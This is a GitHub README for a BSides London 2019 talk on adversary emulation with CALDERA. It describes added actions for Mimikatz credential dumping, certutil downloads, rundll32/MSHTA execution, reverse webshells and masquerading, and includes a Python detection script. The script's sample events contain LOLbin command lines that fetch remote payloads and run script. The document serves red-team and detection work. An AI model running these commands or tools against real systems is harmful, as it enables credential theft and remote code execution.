
Code and Slides of my BSides London 2019 presentation about Attacker Emulation using CALDERA

wietze/bsides-ldn-2019

The Imitation Game: Attacker Emulation

BSides London 2019

This repo contains changes made to the Adversary Plugin repo for CALDERA 2.0.

Presentation

Slides: HTML and PDF

Video: Available here

Code changes

Files that were changed include:

  • The following steps:
    • dump_creds, a fileless Mimikatz in PowerShell action using CustomCommandLine (see below);
    • certutil_download, which can download files using the Certutil LOLbin;
    • rundll32_execution, which can execute commands using the RunDLL32/MSHTA LOLbin;
    • webserver_install, which prepares a webserver installation (creates OPSoftware object, see below); and,
    • webshell_execution, which uses the above three actions to set up a reverse webshell.
  • operation.py, which introduces OPSoftware, which is used by some of the above actions (to implement LOLbins); and,
  • command.py, which introduces CustomCommandLine, which can obfuscate commands and apply masquerading.
    Note that this is still a proof of concept, as it requires you to supply drop_file and file_g functions to make CALDERA aware of renamed binaries in the case of masquerading. See e.g. dump_creds. This should be further optimised.
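Since the actions above exist to exercise detections, here is an added example (not part of this repo or of CALDERA) of detection checks for the techniques they emulate: Certutil downloads, RunDLL32/MSHTA remote execution, and masquerading via renamed binaries. The events are constructed Sysmon-style process-creation records; the field names follow Sysmon Event ID 1, but the hosts, paths and command lines are made up.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/t.txt t.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe http://198.51.100.7/stage.hta"},
    # Renamed rundll32: the on-disk name lies, the PE version info does not.
    {"Image": r"C:\Users\Public\update.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": 'update.exe javascript:"\\..\\mshtml"'},
    # Benign certutil use, to check the rules do not fire on ordinary admin work.
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\tmp\installer.msi SHA256"},
]

# Indicators that a LOLbin is being pointed at remote or script content.
REMOTE = re.compile(r"(?i)\b(https?|ftp)://|\b(javascript|vbscript):")


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules that match one event."""
    image_name = PureWindowsPath(event["Image"]).name.lower()
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    # Masquerading: binary renamed on disk, but OriginalFileName still names the real tool.
    if orig and image_name != orig:
        hits.append("masquerading")
    # certutil_download: URL cache fetch of remote content (rule keyed on OriginalFileName,
    # so renaming the binary does not evade it).
    if orig == "certutil.exe" and "-urlcache" in cmd.lower() and REMOTE.search(cmd):
        hits.append("certutil_download")
    # rundll32_execution: RunDLL32/MSHTA handed a script: or remote URL argument.
    if orig in ("rundll32.exe", "mshta.exe") and REMOTE.search(cmd):
        hits.append("lolbin_remote_execution")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to matching rules, omitting events with no findings."""
    findings = {}
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            findings[i] = hits
    return findings
```

Keying the rules on OriginalFileName rather than the process image name is what makes the masquerading case still surface the underlying LOLbin.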

Installation

Make sure you have the most recent version of CALDERA (for instructions check the CALDERA repo).

You can either copy in the files manually to your caldera/plugins/adversary folder, or:

  1. In the main caldera/ folder, run the following command:
    git config --file=.gitmodules -e
  2. Update the plugins/adversary entry, pointing it to https://github.com/wietze/bsides-ldn-2019.git
    (or git@github.com:wietze/bsides-ldn-2019.git if you're using SSH)
  3. Run the following command to update to the latest version of this repo:
     git submodule sync && git submodule update --remote --merge

If you want to return to the original MITRE repository, follow steps 1-3 again, but use https://github.com/mitre/adversary.git in step 2 (or git@github.com:mitre/adversary.git if you're using SSH).
